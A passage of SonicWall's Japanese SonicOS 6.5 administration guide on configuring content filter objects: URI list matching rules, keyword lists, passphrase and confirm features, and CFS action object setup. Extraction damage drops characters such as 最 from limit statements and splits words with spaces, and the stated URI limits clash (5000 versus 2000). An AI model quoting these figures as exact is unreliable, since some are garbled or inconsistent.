コンテンツ フ ィルタ オブジェク トの

設定

• オブジェク ト > コンテンツ フ ィルタオブジェク ト (226 ページ)

• コンテンツ フ ィルタ オブジェク トについて (227 ページ)

• URI リス トオブジェク トの管理 (232 ページ)

• CFS 動作オブジェク トの管理 (240 ページ)

• CFS プロファイルオブジェク トの管理 (251 ページ)

• コンテンツ フ ィルタ オブジェク トの適用 (257 ページ)

オブジェク ト > コンテンツ フ ィルタオブ

ジェク ト

SonicWall コンテンツ フ ィルタ サービス (CFS) バージョン 4.0 では、 教育機関、 企業、 図書館、 政府機関

向けにコンテンツ フ ィルタが強化されています。 こ う した組織では、 コンテンツ フ ィルタ オブジェク

トの活用により、 ウェブサイ ト を制御したり、 学生や従業員が IT 部門から支給されたコンピュータを

使用して組織のファイアウォールの背後からのアクセスを行ったりできるようになります。

ト ピッ ク :

• コンテンツ フ ィルタ オブジェク トについて (227 ページ)

• URI リス トオブジェク トの管理 (232 ページ)

• CFS 動作オブジェク トの管理 (240 ページ)

メモ : 古いバージ ョ ンから CFS 4.0 へのアップグレードについては、 SonicWall™コンテンツ フ ィ

ルタ サービス アップグレード ガイ ドを参照して く ださい。 また、 これらのオブジェク ト を CFSポリシーに適用するには、 「SonicOS セキュリテ ィ設定」 の技術ドキュ メン トの 「セキュリテ ィ

サービス > コンテンツ フ ィルタ」 セクシ ョ ンを参照して ください。

SonicWall SonicOS 6.5 ポリシー管理

コンテンツ フ ィルタ オブジェク トの設定226

• CFS プロファイルオブジェク トの管理 (251 ページ)

• コンテンツ フ ィルタ オブジェク トの適用 (257 ページ)

コンテンツ フ ィルタ オブジェク トについてCFS では、 セキュリテ ィ保護されるオブジェク ト をコンテンツのフ ィルタ処理に使用します。 セキュ

ア オブジ ェ ク ト とその使用方法については、 「SonicOS システム セッ ト ア ッ プ」 ドキュ メ ン トの

「ネッ トワーク > インターフ ェース」 セクシ ョ ンの 「SonicOS セキュア オブジェク ト」 を参照して く

ださい。 CFS では、 以下のオブジェク ト をコンテンツのフ ィルタ処理に使用します。

• URI リス ト オブジェク ト - URI リス ト オブジェク トについて (227 ページ) を参照

• CFS 動作オブジェク ト - CFS 動作オブジェク トについて (231 ページ) を参照

• CFS プロファイル オブジェク ト - CFS プロファイル オブジェク トについて (231 ページ)

「CFS デフ ォル ト アクシ ョ ン」 および 「CFS デフ ォル ト プロフ ァ イル」 以外のオブジ ェ ク トは、

SonicOS によって作成、 追加、 編集、 または削除できます。

パスフレーズ機能と確認 (規約) 機能も、 コンテンツ フ ィルタ オブジェ ク ト内で設定されます。 パス

フレーズ機能は、 ユーザが正しいパスフレーズまたはパスワードを入力しない限り、 ウェブ アクセ

スを制限します。 確認機能は、 ユーザがウェブ サイ トに進むことを確認しない限り、 ウェブ アクセ

スを制限します。 次を参照して ください。

• パスワード機能について (231 ページ)

• 確認機能について (232 ページ)

URI リス ト オブジェク トについて

URI リス ト オブジェ ク トは、 許可または禁止と してマーク可能な URI (Uniform Resource Identifiers) またはド メインのリス ト を定義します。 この URI リス トは、 外部のファイルにエクスポート したり、 別

の URI リス トにインポート したりすることもできます。

URI リス ト オブジェク トには次の要件があります。

• 大で 128 個の URI リス ト オブジェク トが設定可能です。

• URI リス ト オブジェク トは、 1 個で 大 5000 の URI をサポート します。 小値は 1 です。

• 各 URI リスト オブジェク トには、 大 100 個のキーワードを設定できます。 小値はゼロです。

ト ピック :

• URI と URI リス トについて (228 ページ)

• キーワード とキーワード リス トについて (228 ページ)

• URI リス ト オブジェク トの照合 (229 ページ)

• URI リス ト オブジェク トの使用 (230 ページ)

メモ : URI リス トの処理は、 URI の種別よりも優先されます。

SonicWall SonicOS 6.5 ポリシー管理

コンテンツ フ ィルタ オブジェク トの設定227

URI と URI リス トについて

各 URI リス ト オブジェク トは、 「URI リス ト」 に少な く とも 1 つの URI を持たなければなりません。

「URI リス ト」 に手動でエン ト リを入力または貼り付けたり、 テキス ト (.txt) フ ァイルから URI リス

ト をインポートすることができます。 このファイルは、 手動で作成することも、 以前に装置からエクスポート されたものを使用することもできます。 ファイル内の各 URI はそれ自身の行にあります。

URI リス ト コンテンツをテキスト (.txt) ファイルにエクスポート してお く と、 後でこのファイルからオ

ブジェク ト をインポートすることができます。

URI とURI リス トには次の要件があります。

• URI は 大 255 文字です。

• 1 つの URI リス ト内のすべての URI の長さの合計は、 URI 間の各改行 (復帰) コード用の 1 文字を

含めて、 大 131,072 (1024*128) です。

• 定義上、 URI とはホス ト とパスが含まれている文字列です。 ポートなどのコンテンツは現在サ

ポート されていませんが、 キーワードを使用してこれらのコンテンツに一致させることができます。

• URI のホスト部分には、 IPv4 または IPv6 のアドレス文字列を指定できます。

• 各 URI には、 大で 16 個のトークンを含むことができます。 URI 内のトークンは、 次の文字か

らなる文字列です。

0 ~ 9a ~ zA ~ Z$ - _ + ! ' ( ) , .

• 各トークンの長さは、 トークンを囲む区切り文字 (. または /) 用の 1 文字を含めて、 大

64 文字です。

• 1 つ以上の有効なトークンの列を表すワイルドカード と して、 アスタ リスク (*) が使用で

きます。 アスタ リスクは、 1 つ以上の文字は表しません。

キーワード とキーワード リス トについて

URI リス ト オブジェク トは、 URI リスト を使用してウェブ ト ラフ ィ ックをスキャンするときに URI を照

合します。 これは、 torrent.com が seedtorrent.com と一致しないことを意味する トークン ベー

スの一致アルゴリズムを使用します。 キーワード リストは、 URI 一致をより柔軟にし、 URI リスト オブ

ジェク トを URI の他の部分と一致させることによってト ラフ ィ ックを照合できるようにします。

有効な URI の例 無効な URI の例

• news.example.com • news.example.com/path • news.example.com/path/abc.txt • news.*.com/*.txt • 10.10.10.10 • 10.10.10.10/path • [2001:2002::2003]/path • [2001:2002::2003:*:2004]/path/*.

txt

ワイルド カー ド文字 (*) を誤って使用する

と、 次のよ う な無効な URI になるこ とがあ

ります。 • example*.com • exa*ple.com • example.*.*.com

メモ : ワイルドカード文字は、 1 つ以上の文

字ではな く、 1 つ以上のトークンの系列を表

します。

SonicWall SonicOS 6.5 ポリシー管理

コンテンツ フ ィルタ オブジェク トの設定228

ウェブ ト ラフ ィ ッ クの URI 文字列 (ホスト +パス+クエリ文字列) にキーワード リス トのサブスト リング

がある場合、 URI リス トオブジェ ク トは一致します。 たとえば、 「スポーツ」 と 「ニュース」 がキー

ワード リス トにある場合、 URI リス ト オブジェク トは、 www.extremsports.com, news.google.com/news/headlines?ned=us&hl=en、 または www.yahoo.com/?q=sports と一致させるこ とが

できます。

URI リス ト と同様に、 キーワード リス トに入力または貼り付けすることで手動でエン ト リを追加する

ことも、 テキスト (.txt) ファイルからキーワード リス ト をインポートすることもできます。 このファ

イルは、 手動で作成するこ と も、 以前に装置からエクスポート されたものを使用するこ と もできます。 ファイル内の各キーワードはそれぞれの行にあります。

キーワード リス トの内容を後でインポートできるテキスト ファイルにエクスポートできます。

キーワード とキーワード リス トの用件:

• 各キーワードは、 大で 255 文字の印刷可能な ASCII 文字を含むことができます。

• 1 つのキーワード リス ト内のキーワードの 大結合長は、 キーワード間の改行 (改行) ごとに 1文字を含む 1024 * 2 に制限されています。

URI リス ト オブジェク トの照合

URI リス ト オブジェ ク トの照合処理は、 トークンに基づいています。 有効な トークン系列は、 "." または "/" のような特定の文字で結合された 1 つ以上のトークンで構成されます。 URI は 1 つのトーク

ン系列を表しています。 例えば、 www.example.com という URI は "www"、 "example"、 "com" が"." で結合されたトークン系列です。 通常、 ある URI に URI リス ト オブジェク ト内の URI のいずれか

が含まれている場合、 このリス ト オブジェク トはその URI に一致します。

ト ピッ ク :

• 標準一致 (229 ページ)

• ワイルドカード一致 (230 ページ)

• IPv6 アドレスの照合 (230 ページ)

• IPv6 のワイルドカード照合 (230 ページ)

標準一致

リス ト オブジェク トに example.com のような URI が含まれている場合、 そのオブジェク トは次のよ

うに定義された URI に一致します。

[<トークン系列>(.|/)]example.com[(.|/)<トークン系列>]

例えば、 この URI リス ト オブジェク トは次の URI のいずれにも一致します。

• example.com

• www.example.com

• example.com.uk

• www.example.com.uk

• example.com/path

この URI リス ト オブジェク トは、 specialexample.com という URI には一致しません。

specialexample の部分が example とは異なる トークンであると認識されるからです。

SonicWall SonicOS 6.5 ポリシー管理

コンテンツ フ ィルタ オブジェク トの設定229

ワイルドカード一致

ワイルド カード一致がサポート されています。 アスタ リスク (*) がワイルド カード文字と して使用さ

れ、 この文字はトークンの有効な系列を表します。 リス ト オブジェ ク トに example.*.com のよう

な URI が含まれている場合、 そのリス ト オブジェク トは次のように定義された URI に一致します。

[<トークン系列>(.|/)]example.<トークン系列>.com[(.|/)<トークン系列>]

例えば、 URI リス ト オブジェク ト example.*.com は次の URI のいずれにも一致します。

• example.exam1.com

• example.exam1.exam2.com

• www.example.exam1.com/path

この URI リス ト オブジェク トは次の URI には一致しません。

• example.com

これは、 ワイルド カード文字 (*) が example.com に存在しない有効な トークン系列を表しているた

めです。

IPv6 アドレスの照合

IPv6 アドレス文字列の照合もサポート されています。 IPv4 アドレスは標準のトークン系列として処理

できますが、 IPv6 アドレス文字列は特別な処理を必要とします。 URI リス ト オブジェク トに [2001:2002::2008] のような URI が含まれている場合、 この URI リス ト オブジェ ク トは次のよう

に定義された URI に一致します。

[2001:2002::2008][/<トークン系列>]

例えば、 この URI リス ト オブジェク トは次の URI のいずれにも一致します。

• [2001:2002::2008]

• [2001:2002::2008]/path

• [2001:2002::2008]/path/abc.txt

IPv6 のワイルドカード照合

IPv6 ア ド レス文字列ではワイルド カー ド照合がサポー ト されています。 リ ス ト オブジ ェ ク ト に

[2001:2002:*:2008]/*/abc.mp3 のような URI が含まれている場合、 このリス ト オブジェク トは

次のように定義された URI に一致します。

[2001:2002:<トークン系列>:2008]/<トークン系列>/abc.mp3

例えば、 この URI リス ト オブジェク トは次の URI のいずれにも一致します。

• [2001:2002:2003::2007:2008]/path/abc.txt

• [2001:2002:2003:2004:2005:2006:2007:2008]/path/path2/abc.txt

URI リス ト オブジェク トの使用

現在、 URI リス ト オブジェク トは、 次のフ ィールドで使用できます。

• CFS プロファイルの許可 URI リス ト

• CFS プロファイルの禁止 URI リス ト

• Websense の除外するウェブ ド メ イン

SonicWall SonicOS 6.5 ポリシー管理

コンテンツ フ ィルタ オブジェク トの設定230

CFS URI リス ト オブジェク トの使用法はこれらのフ ィールドで異なります。 CFS プロファイルの許可ま

たは禁止 URI リス トで使用する場合、 CFS URI リス ト オブジェ ク トは通常どおりに動作します。 例え

ば、 リス ト オブジェク トに example.com/path/abc.txt のような URI が含まれている場合、 その

リス ト オブジェク トは次のように定義された URI に一致します。

[<トークン系列>(.|/)] example.com/path/abc.txt[(.|/)<トークン系列>]

Websense の除外するウェブ ド メ インで使用される場合は、 URI のホス ト部分のみが有効です。 例え

ば、 URI リス ト オブジェ ク トに上記のものと同じ example.com/path/abc.txt という URI が含ま

れている場合、 そのリス ト オブジェク トはトークン系列 example.com が含まれているすべてのド メイ

ンに一致します。 URI のパス部分は無視されます。

CFS 動作オブジェク トについて

CFS 動作オブジェク トは、 パケッ トが CFS によってフ ィルタ リングされた後の動作を定義し、 CFS ポリ

シーと一致します。

CFS プロファイル オブジェク トについて

CFS プロファイル オブジェク トは、 各 HTTP/HTTPS 接続に対してト リガされる動作を定義します。

パスワード機能についてパスワード機能は、 確認機能と連携し、 パスワードに基づいてウェブへのアクセスを制限します。 禁止 URI リス トの特別な URI 種別またはド メインを考慮して、 パスワード操作を設定することができま

す。 禁止された URI にアクセスするには、 正しいパスワードを入力するように求められます。 そう し

ないと、 ウェブ アクセスがブロックされます。

確認機能については、 確認機能について (232 ページ) を参照して ください。

パスワード操作は、 次の仕組みで機能します。

1 ユーザが制限されたウェブサイ トへのアクセスを試みます。

2 「パスワード」 ページがユーザのブラウザに表示されます。

3 ユーザは、 パスフレーズまたはパスワードを入力して送信する必要があります。

4 CFS が送信されたパスフレーズ/パスワードをウェブサイ トのパスワード と照合します。

• パスフレーズ/パスワードが一致すると、 ウェブ アクセスは許可されます。 これ以上の確

認は不要です。 確認機能に対して設定されている 「動作時間」 の間、 ユーザは引き続き同じ種別のウェブサイ トにアクセスできます。 既定値は 60 分です。

• パスフレーズ/パスワードが一致しない場合、 アクセスは遮断され、 「遮断」 ページがユー

ザに送信されます。

ユーザが 「キャンセル」 を選択すると、 サイ トはただちに遮断されます。

重要 : パスワードは、 HTTP 要求に対してのみ機能します。 HTTPS 要求はパスフレーズ ページに

はリダイレク トできません。

メモ : ユーザがパスフレーズ/パスワードを入力できるのは 3 回までです。 すべて

失敗するとサイ トは遮断されます。

SonicWall SonicOS 6.5 ポリシー管理

コンテンツ フ ィルタ オブジェク トの設定231

確認機能について確認機能 (規約とも呼ばれます) は、 アクセスを許可する前にユーザに確認を求めることにより、 ウェ

ブ アクセスを制限します。 特別な URI 種別またはド メインを考慮して、 確認操作を設定する必要があ

ります。 また、 ユーザは、 こ う した URI 種別またはド メインへの 初のアクセス時にウェブ要求の確

認を行う ことができます。

確認操作は、 次の仕組みで機能します。

1 ユーザが遮断されたウェブサイ トへのアクセスを試みます。

2 確認を要求するポップアップ ダイアログが表示されます。

3 ユーザは 「継続」 または 「閉じる」 を選択すると必要があります。

• この種別のウェブサイ トへのアクセスを求めていることを確認した場合、 ユーザは確認の対象となった 初のウェブサイ トにリダイレク ト されます。 これ以上の確認は不要です。 確認機能に対して設定されている 「動作時間」 の間、 ユーザは引き続き同じ種別のウェブサイ トにアクセスできます。 既定値は 60 分です。

• 「閉じる」 を選択した場合、 ユーザには 「遮断」 ページが表示され、 設定されている動作時間の間、 その種別のウェブサイ トから遮断されます。

URI リス トオブジェク トの管理

トピック :

• URI リス ト オブジェク ト テーブルについて (232 ページ)

• URI リス ト オブジェク トの設定 (233 ページ)

• URI リス ト オブジェク トのエクスポート (236 ページ)

• URI リス ト オブジェク トの編集 (238 ページ)

• URI リス ト オブジェク トの削除 (239 ページ)

URI リス ト オブジェク ト テーブルについて

重要 : 確認は、 HTTP 要求に対してのみ機能します。 HTTPS 要求は、 「確認」 (同意) ページには

リダイレク トできません。

名前 URI リス ト オブジェク トの名前。

URI リス ト URI リス ト オブジェク トの URI を指定します。

キーワード リス ト

URI リス ト オブジェク トで設定されたキーワードを指定します。

設定 テーブルの各項目に対する 「編集」 アイコンと 「削除」 アイコンがあります。

SonicWall SonicOS 6.5 ポリシー管理

コンテンツ フ ィルタ オブジェク トの設定232

URI リス ト オブジェク トの設定

URI リス ト オブジェク ト を設定するには:

1 管理ビューで、 「ポリシー | オブジェク ト > コンテンツ フ ィルタ オブジェク ト」 に移動します。

2 必要に応じて、 「URI リス ト オブジェク ト」 ボタンを選択して、 「URI リス ト オブジェク ト」

画面を表示します。

3 ページの上部にある 「 追加」 を選択します。

「CFS URI リス ト オブジェク ト」 ダイアログが表示されます。

4 この URI リス ト オブジェク トに付けるわかりやすい名前を 「名前」 フ ィールドに入力します。

5 URI を追加するか、 ファイルから URI をインポートすることができます。 これを行うには、 次の

手順に従います。

• URI を追加する場合は、 手順 6 に進みます。

• URI をインポートする場合は、 手順 10 に進みます。

6 URI を手動で追加するには、 「追加」 を選択します。 「URI の追加」 ダイアログが表示されます。

SonicWall SonicOS 6.5 ポリシー管理

コンテンツ フ ィルタ オブジェク トの設定233

7 URI を入力し、 「保存」 を選択します。 URI 要件については、 URI と URI リス トについて (228 ペー

ジ) を参照して ください。

8 すべての URI を追加するまで、 手順 6 と 手順 7 の操作を繰り返します。

9 インポートの手順をスキップするには、 手順 21 に移動します。 ファイルから URI をインポート

すると、 手動で追加された URI はすべて上書きされます。

10 「インポート」 を選択して、 テキスト ファイルから URI のリストをインポート します。 確認メ ッ

セージが表示されます。

テキス ト フ ァイル内の URI は、 Enter または Return を押すことによって追加されるこれらの区

切り文字のいずれかで区切ることができます。

ファイル内の 初の 2000 件の有効な URI だけがインポート されます。 無効な URI はスキップさ

れ、 1 つの URI リストオブジェク トにつき 2000 件という URI の 大数にはカウン ト されません。

11 確認するには 「OK」 を選択して ください。 「フ ァイルのアップロード」 ダイアログが表示され

ます。

12 フ ァイルを選択し、 「開 く 」 を選択します。 「URI リス ト」 テーブルに情報が設定されます。

「追加」 ボタンを使用してすでに追加されていた URI は、 インポート されたファイルの URI に置き換えられます。

重要 : フ ァイルは、 URI と URI リス トについて (228 ページ) に記載されている条件に準拠

している必要があります。

区切り文字 スタイル

\r\n Windows スタイルの改行文字

\r Mac OS スタイルの改行文字

\n UNIX スタイルの改行文字

SonicWall SonicOS 6.5 ポリシー管理

コンテンツ フ ィルタ オブジェク トの設定234

13 「URI リスト」 に URI を追加し終えたら、 オプションで 「キーワード リスト」 を選択してキーワー

ドを追加します。

キーワード とキーワード リス ト については、 キーワード とキーワード リス ト について (228ページ) を参照して ください。

14 手動でキーワードを追加するには、 「追加」 を選択します。 「キーワードの追加」 ダイアログが表示されます。

15 フ ィールドにキーワードを入力または貼り付け、 「保存」 を選択します。

16 すべてのキーワードを追加するまで、 手順 14 と 手順 15 の操作を繰り返します。

17 手動でキーワードを追加するのではな く、 テキスト ファイルからキーワード リスト をインポー

トするには、 「インポート」 を選択します。 確認メ ッセージが表示されます。

SonicWall SonicOS 6.5 ポリシー管理

コンテンツ フ ィルタ オブジェク トの設定235

18 確認するには 「OK」 を選択して ください。 「フ ァイルのアップロード」 ダイアログが表示され

ます。

19 ファイルを選択し、 「開く 」 を選択します。 「キーワード リスト」 テーブルが読み込まれます。

「追加」 ボタンを使用して既に追加されたキーワードは、 インポー ト されたフ ァ イルのキーワードに置き換えられます。

20 URI とキーワードの追加が終了したら、 「CFS URI リス ト オブジェ ク トの追加」 ダイアログで

「OK」 を選択します。

21 「追加」 を選択します。 「URI リス ト オブジェク ト」 テーブルに情報が設定されます。

22 「キャンセル」 を選択して、 「CFS URI リス ト オブジェク トの追加」 ダイアログを閉じます。

URI リス ト オブジェク トのエクスポート

URI リス ト オブジェク ト をエクスポートするには:

1 管理ビューで、 「ポリシー | オブジェク ト > コンテンツ フ ィルタ オブジェク ト」 に移動します。

2 必要に応じて、 「URI リス ト オブジェク ト」 ボタンを選択して、 「URI リス ト オブジェク ト」

画面を表示します。

3 エクスポートするリス ト オブジェク トの 「設定」 アイコンをクリ ッ クします。

SonicWall SonicOS 6.5 ポリシー管理

コンテンツ フ ィルタ オブジェク トの設定236

「CFS URI リス ト オブジェク トの編集」 ダイアログが表示されます。

4 「エクスポート」 を選択します。 「customizedUriList.rtf を開く 」 ダイアログが表示されます。

5 ファイルを開く (既定のプログラムはメモ帳)、 または保存することができます。 次のようにし

ます。

SonicWall SonicOS 6.5 ポリシー管理

コンテンツ フ ィルタ オブジェク トの設定237

• ファイルを開いた場合、 すべてのエン ト リが 1 行に表示されます。

• ファイルを保存した場合、 ファイルは Downloads フォルダに customizedUriList.rtfという ファイル名でダウンロード されます。 このファイルでは、 各エン ト リの 後に改行文字が追加されます。

6 「OK」 を選択します。

URI リス ト オブジェク トの編集

URI リス ト オブジェク ト を編集するには:

1 管理ビューで、 「ポリシー | オブジェク ト > コンテンツ フ ィルタ オブジェク ト」 に移動します。

2 必要に応じて、 「URI リス ト オブジェク ト」 ボタンを選択して、 「URI リス ト オブジェク ト」

画面を表示します。

3 編集するリスト オブジェク トの 「設定」 アイコンをクリ ックします。 「CFS URI リスト オブジェ

ク トの編集」 ダイアログが表示されます。

4 次の操作が可能です。

• 「URI リスト」 テーブルでエン ト リの 「削除」 (X) アイコンを選択すると、 そのエント リを

削除できます。

• テーブルからすべてのエン ト リを削除するには、 「すべて削除」 をク リ ッ クします。 確認のダイアログで、 「OK」 を選択します。

SonicWall SonicOS 6.5 ポリシー管理

コンテンツ フ ィルタ オブジェク トの設定238

「CFS URI リスト オブジェク トの編集」 ダイアログで 「OK」 を選択すると、 「URI リスト」

テーブルに少な く とも 1 つのエン ト リが残っている必要があることを示すメ ッセージが

表示されます。 次のどちらかを行います。

• 1 つ以上のエン ト リをテーブルに追加します。

• ファイルからエン ト リをインポート します。

• 「キャンセル」 を選択し、 別の方法を試みて ください。

• 「編集」 アイコンをクリ ックして、 エン ト リを編集します。 「URI の編集」 ダイアログが

表示されます。

1) URI に変更を加えます。

2) 「保存」 を選択します。 「URI リス ト」 テーブルの情報が更新されます。

5 「CFS URI リス ト オブジェク トの編集」 ダイアログで 「OK」 を選択します。

URI リス ト オブジェク トの削除

URI リス ト オブジェク ト を削除するには:

1 管理ビューで、 「ポリシー | オブジェク ト > コンテンツ フ ィルタ オブジェク ト」 に移動します。

2 必要に応じて、 「URI リスト オブジェク ト」 ボタンを選択して、 「URI リスト オブジェク ト」 画

面を表示します。

3 次のいずれかを行います。

• 削除するリス ト オブジェク トの 「削除」 アイコンをクリ ックします。

• 削除する 1 つ以上のリス ト オブジェク トのチェ ックボックスをオンにします。 「削除」

ボタンを選択し、 「選択した項目の削除」 を選択します。

すべての URI リス ト オブジェク ト を削除するには:

1 「削除」 ボタンを選択し、 「すべて削除」 を選択します。

SonicWall SonicOS 6.5 ポリシー管理

コンテンツ フ ィルタ オブジェク トの設定239

CFS 動作オブジェク トの管理

トピック :

• CFS 動作オブジェク ト テーブルについて (240 ページ)

• CFS 動作オブジェク トの設定 (240 ページ)

• CFS 動作オブジェク トの編集 (250 ページ)

• CFS 動作オブジェク トの削除 (250 ページ)

CFS 動作オブジェク ト テーブルについて

CFS 動作オブジェク トの設定

既定の CFS 動作オブジェ ク ト である CFS Default Action は、 SonicOS によって作成されます。 この CFS動作 オブジェク トは、 設定および編集は可能ですが、 削除することはできません。

CFS 動作オブジェク ト を設定するには:

1 管理ビューで、 「ポリシー | オブジェク ト > コンテンツ フ ィルタ オブジェク ト」 に移動します。

2 「CFS 動作オブジェク ト」 ボタンを選択して、 「CFS 動作オブジェク ト」 画面を表示します。

名前CFS 動作オブジェ ク トの名前。 既定の名前は "CFS Default Action" です。 既定のオブ

ジェク トは編集可能ですが、 削除はできません。

遮断 「遮断」 ページが 「設定済み」 であるかどうかを示します。

パスワード 「パスフレーズ」 ページが 「設定済み」 であるかどうかを示します。

確認 「確認」 ページが 「設定済み」 であるかどうかを示します。

帯域幅管理 「帯域幅管理」 ページが 「設定済み」 であるかどうかを示します。

設定 テーブルの各項目に対する 「編集」 アイコンと 「削除」 アイコンがあります。

SonicWall SonicOS 6.5 ポリシー管理

コンテンツ フ ィルタ オブジェク トの設定240

3 ページの上部にある 「追加」 を選択します。 「CFS 動作オブジェク ト」 ダイアログが表示され

ます。

4 「名前」 フ ィールドに CFS 動作 オブジェク トの名前を設定します。

5 プライバシーを保護するために Cookie を自動的に削除するには、 「Cookie の消去」 チェ ック ボッ

クスをオンにします。 このオプシ ョ ンとクライアン ト DPI-SSL コンテンツ フ ィルタの両方が有

効になっていると、 HTTPS サイ トの Cookie が削除されます。 このオプシ ョ ンは、 既定では選択

されていません。

6 AppFlow 監視に URI 情報を送信するには、 「フロー報告を有効にする」 チェ ックボックスを選択

します。 このオプシ ョ ンは、 既定では選択されています。

7 サイ トが遮断されたときにどのページを表示するかを、 以下のように設定できます。

• 会社別の遮断サイ ト ポリシーの場合は、 遮断オプシ ョ ン (242 ページ) に進みます。

重要 : このオプシ ョ ンを有効にすると、 一部の検索エンジンのセーフ サーチ強制機能が

侵害されることがあります。

メモ : これらのページには、 既定のバージ ョ ンが作成済みです。 既定のページを使用するほかに、 必要に応じてそれを変更したり、 新しいページを作成したりするこ とができます。

SonicWall SonicOS 6.5 ポリシー管理

コンテンツ フ ィルタ オブジェク トの設定241

• パスワードで保護されたウェブページの場合は、 パスフレーズ オプシ ョ ン (243 ページ)に進みます。

• ユーザが表示する前に確認が求められる制限ウェブページの場合は、 確認オプシ ョ ン

(245 ページ) に進みます。

• 脅威 API 強制による遮断サイ トの場合は、 脅威 API オプシ ョ ン (249 ページ) に進みます。

8 帯域幅リソースを CFS 動作オブジェク トの一部として割り当てることができます。 詳細について

は、 BWM オプシ ョ ン (247 ページ) を参照して ください。

9 「OK」 を選択します。 新しい CFS 動作オブジェク トが 「CFS 動作オブジェク ト」 テーブルに追加

されます。

10 「キャンセル」 を選択して、 「CFS 動作オブジェク トの追加」 ダイアログを閉じます。

遮断オプシ ョ ン

「CFS 動作オブジェク トの追加」 ダイアログにこの画面が表示されます。 ダイアログを開く には、 管

理 ビューを選択し、 「ポリシー | オブジェク ト > コンテンツ フ ィルタ オブジェク ト」 を開き、 「CFS動作オブジェ ク ト」 ボタンを選択して 「CFS 動作オブジェ ク ト」 画面を表示し、 ページ上部の 「追

加」 ボタンを選択します。

サイ トが遮断されたときに表示されるページを作成するには:

1 「操作設定」 で、 「遮断」 ボタンを選択します。

SonicWall SonicOS 6.5 ポリシー管理

コンテンツ フ ィルタ オブジェク トの設定242

既定のページが既に定義されていますが、 遮断されたサイ トにアクセスしよ う と したときにユーザに表示されるウェブ ページは全面的にカスタマイズできます。 または、 ページを独自に

作成することもできます。

2 プレビューを表示するには、 「プレビュー」 ボタンを選択します。

3 確認のダイアログで、 「OK」 を選択します。

4 与えられたコード を変更していなければ、 「プレビュー」 ボタンを選択すると既定のウェブ

ページが表示されます。 遮断ポリシー、 クライアン ト IP アドレス、 および遮断理由が次のよう

に示されます。

プレビューを見終わったら、 「X」 を選択してウィンドウを閉じます。

「遮断ページ」 フ ィールドからすべてのコンテンツを削除するには、 「ク リア」 ボタンを選択します。

既定の遮断ページ メ ッセージに戻すには、 「既定」 ボタンを選択します。

パスフレーズ オプシ ョ ン

「CFS 動作オブジェク トの追加」 ダイアログにこの画面が表示されます。 ダイアログを開く には、 管

理 ビューを選択し、 「ポリシー | オブジェク ト > コンテンツ フ ィルタ オブジェク ト」 を開き、 「CFS動作オブジェ ク ト」 ボタンを選択して 「CFS 動作オブジェ ク ト」 画面を表示し、 ページ上部の 「追

加」 ボタンを選択します。

メモ :パスワード機能については、 パスワード機能について (231 ページ) を参照して ください。

SonicWall SonicOS 6.5 ポリシー管理

コンテンツ フ ィルタ オブジェク トの設定243

パスワードで保護されたウェブページを作成するには:

1 「操作設定」 で、 「パスフレーズ」 ボタンを選択します。

2 「パスワードの入力」 フ ィールドに、 ウェブサイ トのパスフレーズ /パスワードを入力します。

パスワードは 大 64 文字です。

3 「パスワードの確認」 フ ィールドに同じパスフレーズ/パスワードを再入力します。

4 入力中のパスワードを隠すには、 「パスワードを隠す」 チェ ッ クボッ クスを選択します。 このオプシ ョ ンは、 既定では選択されています。

5 種別またはド メインに基づくパスフレーズの有効時間を 「動作時間 (分)」 フ ィールドに入力し

ます。 時間の 小値は 1 分、 大値は 9999 分、 既定値は 60 分です。

6 既定のページが既に定義されていますが、 遮断されたサイ トにアクセスしよ う と したときにユーザに表示されるウェブ ページは全面的にカスタマイズできます。 または、 ページを独自に

作成することもできます。 サイ トが遮断されたときに表示されるページを作成するには:

• プレビューを表示するには、 「プレビュー」 ボタンを選択します。

• 確認のダイアログで、 「OK」 を選択します。

重要 : このオプシ ョ ンの選択を外すと、 パスワードが通常の文字のまま表示され、 「パスワードの確認」 フ ィールドの入力が無効になります。

SonicWall SonicOS 6.5 ポリシー管理

コンテンツ フ ィルタ オブジェク トの設定244

与えられたコード を変更していなければ、 「プレビュー」 ボタンを選択すると既定のウェブ ページが表示されます。 ウェブサイ トの URL、 クライアン ト IP アド レス、 ポリ

シー、 理由、 および動作分数が、 パスワード入力用フ ィールド と共に表示されます。

• 「パスワード ページ」 フ ィールドからすべてのコンテンツを削除するには、 「ク リア」

ボタンを選択します。

• 既定のパスフレーズ ページ メ ッセージに戻すには、 「既定」 ボタンを選択します。

確認オプシ ョ ン

「CFS 動作オブジェク トの追加」 ダイアログにこの画面が表示されます。 ダイアログを開く には、 管

理 ビューを選択し、 「ポリシー | オブジェク ト > コンテンツ フ ィルタ オブジェク ト」 を開き、 「CFS動作オブジェ ク ト」 ボタンを選択して 「CFS 動作オブジェ ク ト」 画面を表示し、 ページ上部の 「追

加」 ボタンを選択します。

メモ : 確認 (同意) の要求は、 HTTP 要求に対してのみ機能します。 HTTPS 要求は、 「確認」 ペー

ジにはリダイレク トできません。 詳細については、 確認機能について (232 ページ) を参照して く

ださい。

SonicWall SonicOS 6.5 ポリシー管理

コンテンツ フ ィルタ オブジェク トの設定245

ユーザが表示する前に確認が求められる制限ウェブページを作成するには:

1 「操作設定」 で、 「確認」 ボタンを選択します。

2 種別またはド メインに基づく確認済みユーザの有効時間を 「動作時間 (分)」 フ ィールドに入力し

ます。 時間の 小値は 1 分、 大値は 9999 分、 既定値は 60 分です。

3 既定のページが既に定義されていますが、 確認サイ トにアクセスしよう と したときにユーザに表示されるウェブ ページは全面的にカスタマイズできます。 または、 ページを独自に作成する

こともできます。 サイ トが遮断されたときに表示されるページを作成するには:

• プレビューを表示するには、 「プレビュー」 ボタンを選択します。

• 確認のダイアログで、 「OK」 を選択します。

与えられたコード を変更していなければ、 「プレビュー」 ボタンを選択すると既定のウェブ ページが表示されます。 ウェブサイ トの URL、 クライアン ト IP アドレス、 遮断ポ

リシー、 および遮断の理由が、 確認入力用フ ィールド と共に表示されます。

SonicWall SonicOS 6.5 ポリシー管理

コンテンツ フ ィルタ オブジェク トの設定246

• 「脅威 API 遮断ページ」 フ ィールドからすべてのコンテンツを削除するには、 「消去」 ボ

タンを選択します。

• 既定の遮断ページ メ ッセージに戻すには、 「既定」 ボタンを選択します。

BWM オプシ ョ ン

「CFS 動作オブジェク トの追加」 ダイアログにこの画面が表示されます。 ダイアログを開く には、 管

理 ビューを選択し、 「ポリシー | オブジェク ト > コンテンツ フ ィルタ オブジェク ト」 を開き、 「CFS動作オブジェ ク ト」 ボタンを選択して 「CFS 動作オブジェ ク ト」 画面を表示し、 ページ上部の 「追

加」 ボタンを選択します。

コンテンツ フ ィルタ リングに使う帯域幅リソースを割り当てるには:

